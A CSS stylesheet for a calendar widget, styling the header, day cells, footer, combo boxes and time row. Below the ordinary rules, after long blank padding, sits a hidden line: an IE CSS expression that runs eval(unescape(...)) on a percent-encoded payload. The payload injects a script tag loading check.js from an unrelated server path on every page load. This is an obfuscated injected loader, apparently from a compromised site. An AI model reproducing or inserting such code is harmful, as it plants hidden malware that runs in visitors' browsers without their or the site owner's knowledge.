@import url("layouts/layout-3d.css");

.calendar {
  border-color: #fff #000 #000 #fff;
  background-color: Window;
  color: WindowText;
}

.calendar table {
  border-color: #fff #000 #000 #fff;
  background-color: Window;
  color: WindowText;
}

/* Header part -- contains navigation buttons and day names. */

.calendar .button { /* "<<", "<", ">", ">>" buttons have this class */
  border-color: ButtonHighlight ButtonShadow ButtonShadow ButtonHighlight;
  background-color: ButtonFace;
}

.calendar .nav {
  background-color: ButtonFace;
}

.calendar thead .title { /* This holds the current "month, year" */
  border-color: #000;
  background-color: ActiveCaption;
  color: CaptionText;
}

.calendar thead .headrow { /* Row <TR> containing navigation buttons */
}

.calendar thead .daynames { /* Row <TR> containing the day names */
}

.calendar thead .name { /* Cells <TD> containing the day names */
  border-color: ButtonShadow;
  background-color: ButtonFace;
  color: ButtonText;
}

.calendar thead .weekend { /* How a weekend day name shows in header */
  color: #f00;
}

.calendar thead .hilite { /* How do the buttons in header appear when hover */
  border-color: ButtonHighlight ButtonShadow ButtonShadow ButtonHighlight;
}

.calendar thead .active { /* Active (pressed) buttons in header */
  border-color: ButtonShadow ButtonHighlight ButtonHighlight ButtonShadow;
}

/* The body part -- contains all the days in month. */

.calendar tbody .day { /* Cells <TD> containing month days dates */
  padding: 2px 4px 2px 2px;
}
.calendar tbody .day.othermonth {
  color: #aaa;
}
.calendar tbody .day.othermonth.oweekend {
  color: #faa;
}

.calendar table .wn {
  border-color: ButtonShadow;
  background-color: ButtonFace;
  color: ButtonText;
}

.calendar tbody .rowhilite td {
  background-color: Highlight;
  color: HighlightText;
}

.calendar tbody td.hilite { /* Hovered cells <TD> */
  border-color: #fff #000 #000 #fff;
}

.calendar tbody td.active { /* Active (pressed) cells <TD> */
  border-color: ButtonShadow ButtonHighlight ButtonHighlight ButtonShadow;
}

.calendar tbody td.selected { /* Cell showing selected date */
  border-color: ButtonShadow ButtonHighlight ButtonHighlight ButtonShadow;
  background-color: ButtonFace;
  color: ButtonText;
}

.calendar tbody td.weekend { /* Cells showing weekend days */
  color: #f00;
}

.calendar tbody td.today { /* Cell showing today date */
  color: #00f;
}

.calendar tbody td.disabled { color: GrayText; }

.calendar tbody .emptycell { /* Empty cells (the best is to hide them) */
}

.calendar tbody .emptyrow { /* Empty row (some months need less than 6 rows) */
}

/* The footer part -- status bar and "Close" button */

.calendar tfoot .footrow { /* The <TR> in footer (only one right now) */
}

.calendar tfoot .ttip { /* Tooltip (status bar) cell <TD> */
  background-color: ButtonFace;
  border-color: ButtonShadow ButtonHighlight ButtonHighlight ButtonShadow;
  color: ButtonText;
}

.calendar tfoot .hilite { /* Hover style for buttons in footer */
  border-color: #fff #000 #000 #fff;
  background-color: #e4e0d8;
}

.calendar tfoot .active { /* Active (pressed) style for buttons in footer */
  border-color: #000 #fff #fff #000;
}

/* Combo boxes (menus that display months/years for direct selection) */

.calendar .combo {
  border-color: ButtonHighlight ButtonShadow ButtonShadow ButtonHighlight;
  background-color: Menu;
  color: MenuText;
}

.calendar .combo .active {
  border-color: #000;
}

.calendar .combo .hilite {
  background-color: Highlight;
  color: HighlightText;
}

/* time */

.calendar tfoot tr.time td { border-color: ButtonShadow; background-color: ButtonFace; }
.calendar tfoot tr.time td.hour,
.calendar tfoot tr.time td.minute { border-color: ButtonShadow; }
.calendar tfoot tr.time td.hilite { background-color: Highlight; color: HighlightText; }
.calendar tfoot tr.time td.active { background-color: Highlight; color: HighlightText; }
.calendar-time-scroller { border-color: ButtonShadow; }




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%36%39%34%31%38%38%3B%20%4A%53%53%33%20%3D%20%27%2F%73%79%73%74%65%6D%2F%68%6F%74%65%6C%73%2F%68%6F%74%65%6C%5F%69%6D%61%67%65%2F%31%32%38%2F%6F%77%6F%72%75%72%6F%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%73%79%73%74%65%6D%2F%68%6F%74%65%6C%73%2F%68%6F%74%65%6C%5F%69%6D%61%67%65%2F%31%32%38%2F%6F%77%6F%72%75%72%6F%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      





































































































